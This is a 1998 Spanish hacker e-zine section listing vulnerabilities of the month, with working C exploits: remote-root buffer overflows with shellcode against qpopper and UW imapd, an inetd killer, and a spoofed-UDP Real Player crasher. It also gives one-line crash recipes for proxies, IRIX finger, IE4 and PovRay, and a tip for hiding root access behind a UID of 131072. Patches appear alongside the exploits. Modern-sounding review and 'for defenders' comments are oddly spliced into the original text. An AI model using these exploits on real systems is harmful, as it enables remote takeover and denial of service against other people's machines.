
SET 16


Los bugs del mes


Autor: SET Staff
-[ 0x09 ]--------------------------------------------------------------------
-[ LOS BUGS DEL MES ]--------------------------------------------------------
-[ by SET Staff ]-----------------------------------------------------SET-16-

-( 0x01 )-
Para	 : Linux kernel
Tema	 : SUID root sin SUID root
Patch	 : Aqui mismito
Creditos : Michal Zalewski

<++> set_016/patches/linuxk
--- linux/kernel/sys.c.orig     Tue Apr  8 17:47:47 1997
+++ linux/kernel/sys.c          Fri Jun 19 16:00:28 1998
@@ -237,6 +237,8 @@
 {
        int old_rgid = current->gid;
        int old_egid = current->egid;
+
+       if (rgid>0xffff || egid>0xffff) return -EINVAL;

        if (rgid != (gid_t) -1) {
                if ((old_rgid == rgid) ||
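Review bot: The new guard runs before the `rgid != (gid_t) -1` test just below it, so if gid_t is wider than 16 bits (which the `>0xffff` comparison presumes) the "leave unchanged" value `(gid_t) -1` is now rejected with -EINVAL. The range check should skip the sentinel, e.g. `if ((rgid != (gid_t) -1 && rgid > 0xffff) || (egid != (gid_t) -1 && egid > 0xffff)) return -EINVAL;`. If gid_t is in fact 16 bits in this tree, the comparison can never be true and the check is dead code, so the parameter width needs confirming either way. The function's signature and the rest of its body are outside the hunk.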
@@ -272,6 +274,8 @@
 asmlinkage int sys_setgid(gid_t gid)
 {
        int old_egid = current->egid;
+
+       if (gid>0xffff) return -EINVAL;

        if (suser())
                current->gid = current->egid = current->sgid = current->fsgid = gid;
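Review bot: The bare literal `0xffff` is added here without a comment, and the same literal is repeated in the sys_setuid, sys_setfsuid, sys_setfsgid and sys_setpgid hunks. A single named limit and a one-line comment such as `/* IDs are stored in 16 bits; reject anything that would be truncated */` above each guard would explain why the bound exists and keep the six checks in step if the storage width changes.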
@@ -489,6 +493,8 @@
 asmlinkage int sys_setuid(uid_t uid)
 {
        int old_euid = current->euid;
+
+       if (uid>0xffff) return -EINVAL;

        if (suser())
                current->uid = current->euid = current->suid = current->fsuid = uid;
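Review bot: None of the hunks shown adds a guard to sys_setreuid, the uid counterpart of the rgid/egid function patched in the first hunk. If that call truncates its arguments the same way, an out-of-range ruid or euid would still be accepted there; that cannot be checked from this patch, so it should be confirmed against the full file. The guard added here, `if (uid>0xffff) return -EINVAL;`, would be the pattern to mirror, with the `-1` sentinel excluded.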
@@ -510,6 +516,8 @@
 asmlinkage int sys_setfsuid(uid_t uid)
 {
        int old_fsuid = current->fsuid;
+
+       if (uid>0xffff) return -EINVAL;

        if (uid == current->uid || uid == current->euid ||
            uid == current->suid || uid == current->fsuid || suser())
@@ -525,6 +533,8 @@
 asmlinkage int sys_setfsgid(gid_t gid)
 {
        int old_fsgid = current->fsgid;
+
+       if (gid>0xffff) return -EINVAL;

        if (gid == current->gid || gid == current->egid ||
            gid == current->sgid || gid == current->fsgid || suser())
@@ -563,6 +573,8 @@
 asmlinkage int sys_setpgid(pid_t pid, pid_t pgid)
 {
        struct task_struct * p;
+
+       if (pid>0xffff || pgid>0xffff) return -EINVAL;

        if (!pid)
                pid = current->pid;
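Review bot: pid_t is normally a signed type, so `pid>0xffff || pgid>0xffff` lets negative values through while rejecting large positive ones; whether the rest of sys_setpgid rejects negatives is outside the hunk. If the intent is a range check, both ends belong in it: `if (pid < 0 || pid > 0xffff || pgid < 0 || pgid > 0xffff) return -EINVAL;`. It is also not evident from the patch that process IDs share the 16-bit storage limit the other hunks address, so a comment stating why this call is included would help.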
<-->


Descripcion y Notas:

Un error en la definicion de algunas variables que intervienen en la
gestion del UID permite poseer una ID distinta de 0 y que para el sistema
sea eficazmente ID 0 (root).

El kernel almacena la ID en un word (2 bytes), lo que limita el ID al
rango entre 0 y 65535. Sin embargo, el tipo definido para el manejo de
UID y GID (uid_t) se declara como un entero sin signo, lo que le da la
posibilidad de manejar IDs por encima de 65535.

Por su parte, algunas llamadas al sistema, como sys_setuid(uid_t), truncan
el valor de la ID a 2 bytes.

De esta forma, si alteramos el fichero /etc/passwd de forma que nuestra ID
sea 131072 (10 00000000 00000000), nuestra ID eficaz sera 0, es decir, los
dos bytes menos significativos. Y como las utilidades para la deteccion de
intrusos en el fichero /etc/passwd buscan por ID 0, pasamos desapercibidos.
Por eso una auditoria de /etc/passwd deberia marcar tambien cualquier ID
mayor de 65535, y no solo el 0 literal.

Tambien funciona en el caso de accesos restringidos desde el exterior. Es
habitual no permitir el acceso remoto con privilegios de root. Con nuestra
ID 131072, no tenemos privilegios, por lo que podemos acceder remotamente
sin problemas, pero para el kernel nuestra ID es la del root.


-( 0x02 )-
Para	 : Qpopper 2.4x
Tema	 : De todo un poco
Patch	 : Actualizacion
Creditos : Herbert Rosmanith

<++> set_016/exploits/qpush.c
/* qpush: qualcom popper buffer overflow exploit (pop_msg)
 * Mon Jun 29 01:26:06 GMT 1998 - herp
 *                                Herbert Rosmanith
 *                                herp@wildsau.idv.uni-linz.ac.at
 */

#include        <stdio.h>
#include        <sys/time.h>
#include        <sys/types.h>
#include        <netinet/in.h>
#include        <netdb.h>
#include        <signal.h>
#include        <unistd.h>
#include        <errno.h>

/* Table of 32-bit values, one per supported server build; main() selects an
 * entry with the -index option and copies 4 bytes of it into the request
 * buffer. The trailing comments match the versions listed by usage().
 * NOTE(review): these look like fixed stack addresses from the author's
 * test builds, so they would not be expected to match other builds --
 * confirm. */
long addrlist[]={
        0xbfffeee4,             /*2.2*/
        0xbfffeb80              /*2.41beta1*/
};

/* Raw machine-code bytes followed by the literal text "/bin/sh" and filler
 * dots. main() measures it with strlen(), so the array relies on holding no
 * zero byte before its terminator. The opcodes are not analysed here. */
char shellcode[] =
    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
    "\xff\xff/bin/sh.........";

/* Report a fatal error and terminate with exit status -1.
 * When errno is set the message goes through perror(), which appends the
 * system error text; otherwise s is printed alone on stderr. */
void die(char *s) {
        if (errno == 0)
                fprintf(stderr,"%s\n",s);
        else
                perror(s);
        exit(-1);
}

/* Print the command-line synopsis on stdout and exit with status 0. */
void usage() {
        fputs("qpush [-index] <hostname>\n"
              " -0 QPOP Version 2.2             (default)\n"
              " -1 QPOP Version 2.41beta1\n", stdout);
        exit(0);
}

/* Turn a host string into an IPv4 address stored through ipaddr.
 * A string starting with a digit is parsed with inet_addr(); anything else
 * is looked up with gethostbyname().
 * Returns 0 on success and -1 when the inet_addr() result compares equal
 * to -1; a failed name lookup does not return but exits with status -1. */
int resolv(char *host,long *ipaddr) {
        if (isdigit(host[0])) {
                *ipaddr=inet_addr(host);
                if (*ipaddr==-1) return -1;
        }
        else {
                struct hostent *hp;
                if ((hp=gethostbyname(host))==NULL) {
                        /* NOTE(review): the format contains %s but no
                         * matching argument is passed, which is undefined
                         * behaviour; host was presumably intended. */
                        fprintf(stderr,"tc: %s: unknown host\n");
                        exit(-1);
                }
                /* Takes the first address of the lookup result.
                 * NOTE(review): it is read through an unsigned long
                 * pointer; where long is wider than the stored address
                 * this reads past it -- confirm for the target ABI. */
                *ipaddr=*(unsigned long *)hp->h_addr;
        }
        return 0;
}

/* Open a TCP connection to hostname:port and return the socket descriptor.
 * Any failure (socket creation, address resolution, connect) ends the
 * process through die(); the function only returns on success. */
int connect_to(char *hostname,short port) {
struct sockaddr_in s_in;
int s;

        s=socket(PF_INET,SOCK_STREAM,0);
        if (s==-1) die("socket");

        /* resolv() stores the address through a long pointer aimed at the
         * s_addr field. NOTE(review): s_in is never zeroed beforehand. */
        if (resolv(hostname,(long *)&s_in.sin_addr.s_addr)==-1)
                die("unknown host");
        s_in.sin_family=AF_INET;
        s_in.sin_port=htons(port);      /* port goes out in network order */

        if (connect(s,(struct sockaddr *)&s_in,sizeof(s_in))==-1)
                die("connect");

        return s;
}

/* Read up to len bytes from socket s into buf and NUL-terminate the data.
 * A read error or end-of-file terminates the process through die().
 * NOTE(review): when read() fills all len bytes, buf[i]=0 stores one byte
 * past the len bytes the caller offered; main() passes sizeof(buf). */
void socket_read(int s,char *buf,int len) {
int i;
        switch(i=read(s,buf,len)) {
        case -1: die("unexpected EOF");   /* die() exits, so no fall-through */
        case  0: die("EOF");
        default:
                buf[i]=0;
                /* debug echo of the server reply, left disabled */
                //printf("%s",buf);
                break;
        }
}

/* Relay bytes between the local terminal and socket s until one side
 * closes: socket data is copied to fd 1, data from fd 0 is copied to the
 * socket. Every signal number below NSIG is set to SIG_IGN first. Never
 * returns; die() ends the process when select() or a read fails.
 * NOTE(review): the write() results are ignored, so a short write silently
 * drops data. */
void terminal(int s) {
char buf[1024];
fd_set rfds;
fd_set fds;
int i;

        for (i=0;i<NSIG;i++) signal(i,SIG_IGN);
        FD_ZERO(&fds);
        FD_SET(0,&fds);
        FD_SET(s,&fds);
        for (;;) {
                /* select() modifies its set, so work on a fresh copy */
                memcpy(&rfds,&fds,sizeof(fds));
                i=select(s+1,&rfds,NULL,NULL,NULL);
                if (i==-1) die("select");
                if (i==0) die("session closed");
                if (FD_ISSET(s,&rfds)) {
                        if ((i=read(s,buf,sizeof(buf)))<1)
                                die("session closed");
                        write(1,buf,i);
                }
                if (FD_ISSET(0,&rfds)) {
                        if ((i=read(0,buf,sizeof(buf)))<1)
                                die("session closed");
                        write(s,buf,i);
                }
        }
}

/* Entry point: qpush [-index] <hostname>.
 * Connects to TCP port 110 on the host, reads the greeting, then sends one
 * sizeof(buf) (1152-byte) block: 0x90 filler, the shellcode array at offset
 * 941, ten copies of the selected addrlist entry from offset 981, and a
 * CR LF NUL tail. After reading the reply it hands the socket to terminal().
 * For defenders: the request is a single line over a kilobyte long, made
 * mostly of 0x90 bytes and carrying no POP3 verb -- far outside normal
 * POP3 traffic and straightforward to match on length or content. The
 * accompanying text lists upgrading qpopper as the fix. */
void main(int argc,char *argv[]) {
char buf[1024+128];
int s,i,ix;

        /* an optional leading "-N" argument selects the addrlist entry */
        if (argc>=2 && argv[1][0]=='-') {
                ix=atoi(&argv[1][1]);
                argc--;
                argv++;
        }
        else ix=0;

        /* NOTE(review): the bound uses > rather than >=, so an index equal
         * to the number of table entries passes this check. */
        if (argc!=2 || ix>sizeof(addrlist)/sizeof(long))
                usage();

        s=connect_to(argv[1],110);      /* WKS POP3 */
        socket_read(s,buf,sizeof(buf));
        memset(buf,0x90,sizeof(buf));
        for (i=981;i<981+10*4;i+=4)
                memcpy(&buf[i],&addrlist[ix],4);
        memcpy(&buf[941],shellcode,strlen(shellcode));
        buf[sizeof(buf)-3]=0x0d;
        buf[sizeof(buf)-2]=0x0a;
        buf[sizeof(buf)-1]=0x00;
        write(s,buf,sizeof(buf));
        socket_read(s,buf,sizeof(buf));
        terminal(s);
}
<-->

Descripcion y Notas:

Menuda se ha montado este verano con el qpopper. Nadie se aclara. Por un
lado buffers overflow, por otro core dumps, y no pueden faltar cualquier
otro tipo de anomalias.

Pese a que el fallo original parece afectar a las implementaciones en
diferentes sistemas operativos, el exploit que os dejamos solo funciona
para la version de Linux, excepto para la Debian con el QPop v2.2.

Al final los de Qualcomm han sacado por fin una version nueva, aparentemente
sin el fallo que ha generado tanto revuelo. Para conseguirla:

    ftp://ftp.qualcomm.com/oldeudora/servers/unix/popper/qpopper2.5.tar.Z


-( 0x03 )-
Para	 : Linux 2.0.34 inetd
Tema	 : Matar el inetd
Patch	 : Kernel 2.0.35
Creditos : David Luyer

<++> set_016/exploits/inetdkill.c
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Entry point: inetdkill <pid>.
 * Makes process <pid> the owner of standard input for signal delivery
 * (F_SETOWN), turns on O_ASYNC so that pending input raises SIGIO for that
 * owner, waits for the user to press enter, then turns O_ASYNC off again.
 * According to the accompanying text, kernel 2.0.34 delivers this signal
 * whether or not the caller has privileges over the target, and kernel
 * 2.0.35 is the fix.
 * NOTE(review): none of the fcntl() results are checked, and a missing
 * argument exits with status 0 rather than an error status. */
int main(int argc, char *argv[]) {
  int s, p;

  if(argc != 2) {
    fputs("Please specify a pid to send signal to.\n", stderr);
    exit(0);
  } else {
    p = atoi(argv[1]);
  }
  fcntl(0,F_SETOWN,p);          /* p becomes the SIGIO recipient for fd 0 */
  s = fcntl(0,F_GETFL,0);       /* remember the current flags */
  fcntl(0,F_SETFL,s|O_ASYNC);
  printf("Sending SIGIO - press enter.\n");
  getchar();
  fcntl(0,F_SETFL,s&~O_ASYNC);  /* restore: O_ASYNC cleared again */
  printf("SIGIO send attempted.\n");
  return 0;
}
<-->

Descripcion y Notas:

La ejecucion de este codigo en un Linux con el kernel 2.0.34, se tengan o no
privilegios, mata el demonio inetd.

En aquellos sistemas que no usen glibc, debe añadirse la linea:

#define O_ASYNC FASYNC


-( 0x04 )-
Para	 : Red Hat 4.2, 5.0 y 5.1
Tema	 : Programas con agujeros
Patch	 : Actualizarse
Creditos : twiztah

Descripcion y Notas:

Algunos de los binarios que se instalan con las distribuciones de Red Hat
que hemos mencionado presentan problemas de seguridad importantes, por lo
que se recomienda actualizarse a las nuevas versiones.

Los programas afectados son: bind, libtermcap, tin, slang, metamail, mailx
y dosemu.

Las actualizaciones (para la 5.1) las teneis disponibles en:

     ftp://ftp.redhat.com/updates/5.1/i386/metamail-2.7-17.i386.rpm
     ftp://ftp.redhat.com/updates/5.1/i386/mailx-8.1.1-3.i386.rpm
     ftp://ftp.redhat.com/updates/5.1/i386/bind-4.9.7-1.i386.rpm
     ftp://ftp.redhat.com/updates/5.1/i386/slang-0.99.38-7.i386.rpm
     ftp://ftp.redhat.com/updates/5.1/i386/tin-1.22-11.i386.rpm
     ftp://ftp.redhat.com/updates/5.0/i386/dosemu-0.66.7-7.i386.rpm
     ftp://ftp.redhat.com/updates/5.0/i386/libtermcap-2.0.8-9.i386.rpm

Los usuarios de las distribuciones 5.0 y 4.2 las encontrareis en:

     ftp://ftp.redhat.com/updates/5.0/i386/
     ftp://ftp.redhat.com/updates/4.2/i386/

Los nombres de los ficheros son los mismos, variando la version de la
actualizacion. Existen tambien actualizaciones para alpha y sparc en
los directorios correspondientes.


-( 0x05 )-
Para	 : Proxy en Windows 95
Tema	 : Cuelgue del proxy
Patch	 : Supongo que en las paginas oficiales
Creditos : Ryan Nichols

Descripcion y Notas:

Solo dos son los programas proxy afectados en esta ocasion: WinGate y
Startech. En ambos casos el procedimiento es similar.

Comenzamos haciendo un telnet al puerto pop3 del proxy. En el caso de ser
WinGate, teclearemos:

USER x#99999.....

Con todos los '9' que podamos.

De tratarse de Startech, tecleamos:

USER x<9999...>

De nuevo con todos los '9' posibles. El resultado es el mismo.


-( 0x06 )-
Para	 : Real Player 5
Tema	 : Cuelgue del real Player
Patch	 : En la ultima version
Creditos : Kit Knox

<++> set_016/exploits/rpkiller.c
/*
 * Real Player Killer - 6/26/98
 *
 * (C) 1998 Kit Knox <kit@connectnet.com>
 *
 * [ http://www.rootshell.com/ ]
 *
 * Real Player 5.0 for Windows95 and Linux (others untested) do not check
 * the validity of incoming UDP packets used when receiving audio/video.
 *
 * If you are able to determine or brute force the destination port of the
 * stream you are able to crash the player and cause it to use 100% of
 * idle CPU.  I would not be surprised if there are numerous buffer
 * overflows in this area as well.  The client does not even check if the
 * source IP address is the one it is receiving data from.  Any source IP
 * can be used.
 *
 * Generally the stack will start with port 1025 and go up.  Starting there
 * and going up will generally give you good results.  If you are able to
 * sniff the network you will know the exact port and not have to guess.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <linux/udp.h>
#include <netdb.h>

/* Print a fixed message to stderr and exit with status 1. x is used
 * directly as the format string, so it must be a literal. The body is a
 * bare brace block, not a do { } while (0) wrapper. */
#define err(x) { fprintf(stderr, x); exit(1); }
/* Same, with one argument y substituted into format x. */
#define errs(x, y) { fprintf(stderr, x, y); exit(1); }

/* Two zero bytes that main() passes as the leading payload of each packet. */
char real_data[] =
  { 0x00, 0x00 };


/* 16-bit one's-complement checksum over len bytes starting at addr.
 * Adds the data as 16-bit words, adds a trailing odd byte if there is one,
 * folds the carries back into the low 16 bits and returns the complement.
 * K&R-style definition: callers get no prototype checking on addr. */
unsigned short
in_cksum (addr, len)
     u_short *addr;
     int len;
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  /* sum whole 16-bit words */
  while (nleft > 1)
    {
      sum += *w++;
      nleft -= 2;
    }
  /* odd length: place the last byte in the first byte of answer */
  if (nleft == 1)
    {
      *(u_char *) (&answer) = *(u_char *) w;
      sum += answer;
    }

  /* fold the upper 16 bits into the lower 16, twice to absorb the carry */
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return (answer);
}

/* Build one IPv4+UDP datagram by hand and send it on raw socket s.
 * sin is the sendto() destination; saddr/daddr and sport/dport are written
 * into the headers exactly as given, so the source address is whatever the
 * caller supplies. data/datalen is the leading payload and 500 random bytes
 * are appended after it. Returns the sendto() result (-1 on failure).
 * NOTE(review): tot_len and udp.len are computed from datalen only, while
 * the length handed to sendto() is 500 bytes larger. datalen is also never
 * checked against the 8192-byte packet buffer. */
int
sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport)
     struct sockaddr_in *sin;
     unsigned short int s, datalen, sport, dport;
     unsigned long int saddr, daddr;
     char *data;
{
  struct iphdr ip;
  struct udphdr udp;
  static char packet[8192];
  char crashme[500];
  int i;

  /* IPv4 header: 5 words, no options, random TOS, id in 31337..31436 */
  ip.ihl = 5;
  ip.version = 4;
  ip.tos = rand () % 100;;
  ip.tot_len = htons (28 + datalen);
  ip.id = htons (31337 + (rand () % 100));
  ip.frag_off = 0;
  ip.ttl = 255;
  ip.protocol = IPPROTO_UDP;
  ip.check = 0;                 /* must be zero while the sum is computed */
  ip.saddr = saddr;
  ip.daddr = daddr;
  ip.check = in_cksum ((char *) &ip, sizeof (ip));
  /* UDP header; the checksum field is left at 0 */
  udp.source = htons (sport);
  udp.dest = htons (dport);
  udp.len = htons (8 + datalen);
  udp.check = (short) 0;
  /* lay out header, header, payload, then the random tail */
  memcpy (packet, (char *) &ip, sizeof (ip));
  memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp));
  memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen);
  for (i = 0; i < 500; i++)
    crashme[i] = rand () % 255;
  memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500);
  return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0,
                  (struct sockaddr *) sin, sizeof (struct sockaddr_in)));
}

/* Resolve host to an IPv4 address: inet_addr() is tried first and
 * gethostbyname() is used when that result equals -1. Returns the address
 * as stored by those calls, or 0 when the name lookup fails (main() treats
 * 0 as "lookup failed"). */
unsigned int
lookup (host)
     char *host;
{
  unsigned int addr;
  struct hostent *he;

  addr = inet_addr (host);
  if (addr == -1)
    {
      he = gethostbyname (host);
      if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
        return 0;

      /* NOTE(review): the copy length is sizeof of the h_addr_list pointer,
       * not the address length; where pointers are wider than unsigned int
       * this writes past addr. */
      bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
    }
  return (addr);
}

/* Entry point: <source_addr> <dest_addr> <low port> <high port>.
 * Opens a raw socket, resolves both addresses with lookup(), then calls
 * sendpkt_udp() once for every destination port from low up to but not
 * including high, stopping at the first send error.
 * For defenders: as built by sendpkt_udp(), the traffic is UDP from source
 * port 2014 to consecutive destination ports, with TTL 255 and an IP id in
 * 31337..31436. The source address is caller-chosen, so filtering on it is
 * unreliable; the port sweep and fixed source port are the stable traits.
 * The accompanying text lists the latest player version as the fix. */
void
main (argc, argv)
     int argc;
     char **argv;
{
  unsigned int saddr, daddr;
  struct sockaddr_in sin;
  int s, i;

  if (argc != 5)
    errs ("Usage: %s <source_addr> <dest_addr> <low port> <high port>\n", argv[0]);

  printf("Real Player Killer - http://www.rootshell.com/\n\n");
  if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
    err ("Unable to open raw socket.\n");
  if (!(saddr = lookup (argv[1])))
    err ("Unable to lookup source address.\n");
  if (!(daddr = lookup (argv[2])))
    err ("Unable to lookup destination address.\n");
  sin.sin_family = AF_INET;
  sin.sin_port = 9;             /* NOTE(review): stored without htons() */
  sin.sin_addr.s_addr = daddr;
  /* argument order below: ..., source port 2014, destination port i */
  for (i=atoi(argv[3]); i<atoi(argv[4]); i++)
  if ((sendpkt_udp (&sin, s, &real_data, sizeof (real_data), saddr, daddr, 2014, i)) == -1)
    {
      perror ("sendpkt_udp");
      err ("Error sending the UDP packet.\n");
    }
  printf("Done!\n");
}
<-->


-( 0x07 )-
Para	 : SlackWare 3.4 /bin/login
Tema	 : Acceso modo root
Patch	 : /etc/groups
Creditos : Richard Thomas

Descripcion y Notas:

Cada vez nos lo ponen mas simple.

En esta ocasion, si accedemos a un SlackWare que no tiene el fichero
/etc/groups directamente conseguimos UID 0 GID 0... root access granted ;)


-( 0x08 )-
Para	 : IRIX 6.3 y 6.4
Tema	 : Sobrecarga del procesador
Patch 	 : Uhmmm!
Creditos : Matthew Potter

Descripcion y Notas:

Tan simple como ejecutar:

finger -l @@@@@@@@@@@@@@@@@@@@@destino@bounce_host

donde debe haber unas 500 @

Entonces la maquina destino sufre una sobrecarga de procesos importante.


-( 0x09 )-
Para	 : UW imapd (Pine 4.0)
Tema	 : Root access entre otras cosas
Patch	 : Aqui y en la UW
Creditos : Cheez Whiz

<++> set_016/exploits/imappy.c
/**
***  i386 BSD remote root exploit for UW imapd IMAP 4.1 server
***
***  This is *not* the same bug addressed in CERT Advisory CA-97.09!
***
***  Usage:  % (imappy nop esp offset; cat) | nc hostname 143
***
***  where nop is the number of NOP opcodes to place at the start of the
***  exploit buffer (I use 403), esp is the %esp stack pointer value, and
***  offset is the number of bytes to add to esp to calculate your target
***  %eip.
***
***  Demonstration values for UW imapd 10.234 (part of Pine 4.00):
***
***      imappy 403 0xefbfd5e8 100    (BSDI 3.0)
***      imappy 403 0xefbfd4b8 100    (FreeBSD 2.2.5)
***
***  THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER
***
***  Cheez Whiz
***  cheezbeast@hotmail.com
***
***  July 16, 1998
**/

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

/* Size in bytes of the generated buffer, and the filler byte used for it. */
#define BUFLEN (2*1024)
#define NOP 0x90

/* Machine-code payload with the author's own per-instruction annotations.
 * main() copies it with strlen(), so it relies on containing no zero byte.
 * Per those annotations the "/bin/sh" string is stored with the high bit
 * set on its letters and the code masks bytes with 0x7f at run time. */
char shell[] =
/*  0 */ "\xeb\x34"                      /* jmp springboard              */
/* start:                                                                */
/*  2 */ "\x5e"                          /* popl %esi                    */
/*  3 */ "\x8d\x1e"                      /* leal (%esi),%ebx             */
/*  5 */ "\x89\x5e\x0b"                  /* movl %ebx,0xb(%esi)          */
/*  8 */ "\x31\xd2"                      /* xorl %edx,%edx               */
/* 10 */ "\x89\x56\x07"                  /* movl %edx,0x7(%esi)          */
/* 13 */ "\x89\x56\x0f"                  /* movl %edx,0xf(%esi)          */
/* 16 */ "\x89\x56\x14"                  /* movl %edx,0x14(%esi)         */
/* 19 */ "\x88\x56\x19"                  /* movb %dl,0x19(%esi)          */
/* 22 */ "\x31\xc0"                      /* xorl %eax,%eax               */
/* 24 */ "\xb0\x7f"                      /* movb $0x7f,%al               */
/* 26 */ "\x20\x46\x01"                  /* andb %al,0x1(%esi)           */
/* 29 */ "\x20\x46\x02"                  /* andb %al,0x2(%esi)           */
/* 32 */ "\x20\x46\x03"                  /* andb %al,0x3(%esi)           */
/* 35 */ "\x20\x46\x05"                  /* andb %al,0x5(%esi)           */
/* 38 */ "\x20\x46\x06"                  /* andb %al,0x6(%esi)           */
/* 41 */ "\xb0\x3b"                      /* movb $0x3b,%al               */
/* 43 */ "\x8d\x4e\x0b"                  /* leal 0xb(%esi),%ecx          */
/* 46 */ "\x89\xca"                      /* movl %ecx,%edx               */
/* 48 */ "\x52"                          /* pushl %edx                   */
/* 49 */ "\x51"                          /* pushl %ecx                   */
/* 50 */ "\x53"                          /* pushl %ebx                   */
/* 51 */ "\x50"                          /* pushl %eax                   */
/* 52 */ "\xeb\x18"                      /* jmp exec                     */
/* springboard:                                                          */
/* 54 */ "\xe8\xc7\xff\xff\xff"          /* call start                   */
/* data:                                                                 */
/* 59 */ "\x2f\xe2\xe9\xee\x2f\xf3\xe8"  /* DATA (disguised /bin/sh)     */
/* 66 */ "\x01\x01\x01\x01"              /* DATA                         */
/* 70 */ "\x02\x02\x02\x02"              /* DATA                         */
/* 74 */ "\x03\x03\x03\x03"              /* DATA                         */
/* exec:                                                                 */
/* 78 */ "\x9a\x04\x04\x04\x04\x07\x04"; /* lcall 0x7,0x0                */

/* Output buffer and the three command-line values, all set in main(). */
char buf[BUFLEN];
unsigned long int nop, esp;
long int offset;

/* Entry point: imappy nop esp offset.
 * Fills the 2048-byte buf with NOP, copies shell at byte offset nop, then
 * overwrites the remainder in 4-byte steps with esp + offset. The result is
 * written to stdout as "* AUTHENTICATE {2048}", the raw buffer, and CRLF;
 * the file's header comment pipes that output to port 143.
 * For defenders: the request is an AUTHENTICATE command whose argument is a
 * 2048-byte binary literal rather than a short mechanism name. The patched
 * mail_auth() given in the accompanying text rejects and logs any mechanism
 * name of MAILTMPLEN bytes or more.
 * NOTE(review): nop is not range-checked, so a large value makes the
 * memcpy() below write outside buf. */
void
main (int argc, char *argv[])
{
    int i;

    if (argc < 4) {
        printf("usage: %s nop esp offset\n", argv[0]);
        return;
    }

    /* base 0: decimal, octal or 0x-prefixed hex are all accepted */
    nop = strtoul(argv[1], NULL, 0);
    esp = strtoul(argv[2], NULL, 0);
    offset = strtol(argv[3], NULL, 0);

    memset(buf, NOP, BUFLEN);
    memcpy(buf+nop, shell, strlen(shell));
    for (i = nop+strlen(shell); i < BUFLEN - 4; i += 4)
        *((int *) &buf[i]) = esp + offset;

    printf("* AUTHENTICATE {%d}\r\n", BUFLEN);
    /* putchar per byte, so the binary buffer is emitted unmodified */
    for (i = 0; i < BUFLEN; i++)
        putchar(buf[i]);
    printf("\r\n");

    return;
}
<-->

Descripcion y Notas:

Un error en la implementacion del imapd que se distribuye conjuntamente al
Pine 4.0, permite, entre otras cosas, conseguir accesos no autorizados de
forma remota.

El parche lo distribuye la Universidad de Washington, con la numeracion
10234, como el original. De todas formas, basta con cambiar el codigo de la
funcion mail_auth() de mail.c que se distribuye por el siguiente para evitar
el problema

<++> set_016/patches/imapd.c
/* Look up the server-side authenticator named by mechanism and run it.
 * mechanism is the client-supplied name; resp, argc and argv are passed
 * through to the authenticator's server routine. Returns that routine's
 * result, or NIL when the name is too long or matches no authenticator.
 * The length test has to come before the copy: tmp is a fixed MAILTMPLEN
 * buffer, and an over-long name is logged as a break-in attempt instead of
 * being copied. */
char *mail_auth (char *mechanism,authresponse_t resp,int argc,char *argv[])
{
  char tmp[MAILTMPLEN];
  AUTHENTICATOR *auth;

  if (strlen (mechanism) >= MAILTMPLEN) {
    syslog (LOG_ALERT|LOG_AUTH,"System break-in attempt, host=%.80s",
            tcp_clienthost ());
    return NIL;                 /* refuse without touching tmp */
  }

  strcpy (tmp,mechanism);       /* fits: length was checked above */
  ucase (tmp);                  /* authenticator names are matched in upper case */
  auth = mailauthenticators;
  while (auth) {
    if (auth->server && !strcmp (auth->name,tmp))
      return (*auth->server) (resp,argc,argv);
    auth = auth->next;
  }
  return NIL;                   /* no authenticator found */
}
<-->

Si lo preferis, podeis obtener la version ya parcheada en:

		ftp://ftp.cac.washington.edu/mail/imap.tar.Z


-( 0x0A )-
Para	 : who
Tema	 : Lo que se os ocurra
Patch	 : A ver, a ver...
Creditos : Paul Boehm

Descripcion y Notas:

En algunos sistemas, who se encuentra en el grupo de los programas
privilegiados, que, por ejemplo, pueden leer el utmp.

Ejecutando who con algunos truquitos, podemos hacer casi de todo.

Por ejemplo, en RedHat 5.1, al ejecutar who /bin/bash el sistema se cuelga.
En FreeBSD puede usarse para ver ficheros pertenecientes al mismo grupo que
who, de la forma who /fichero


-( 0x0B )-
Para	 : PovRay 3.02
Tema	 : Acceso root
Patch	 : Ya veremos
Creditos : Luke

Descripcion y Notas:

Al instalar el PovRay 3.02 para linux, la libreria s-povray tiene que
tener suid root para poder ejecutarse sin problemas (acceso a /dev/console).

El problema surge cuando desde la shell damos un nombre de fichero largo,
resultando en un segmentation fault.

Ejemplo:

[root@hazard root]# s-povray -I`perl -e "print 'A'x1000"`


-( 0x0C )-
Para	 : Internet Explorer 4.0
Tema	 : System Crash entre otros
Patch	 : Mozilla rulez !!!
Creditos : Varios

Descripcion y notas:

Por una parte, tenemos que si incluimos la etiqueta <OBJECT> en una pagina
HTML y la cargamos con el Explorer, podemos hacer desde que el explorer
se cierre hasta llegar al pantallazo azul.
Pero para ello, la etiqueta debe llevar algo especial. Veamos:

<OBJECT CLASSID=---mas de 250 caracteres----></OBJECT>

Segun como le de al sistema, pasara una cosa u otra.

Tambien tenemos el siguiente codigo:

<++> set_016/exploits/ie4.html
<HTML>
<title>Adios IE 4.0</title>
<OBJECT CLASSID=#></OBJECT>
</HTML>
<-->


-( 0x0D )-
Para	 : Microsoft Outlook
Tema	 : Overflow
Patch	 : Microsoft?!?!?! LINUX !!!!
Creditos : Ryan Veety

Descripcion y Notas:

Un mensaje que contenga:

MIME-Version: 1.0
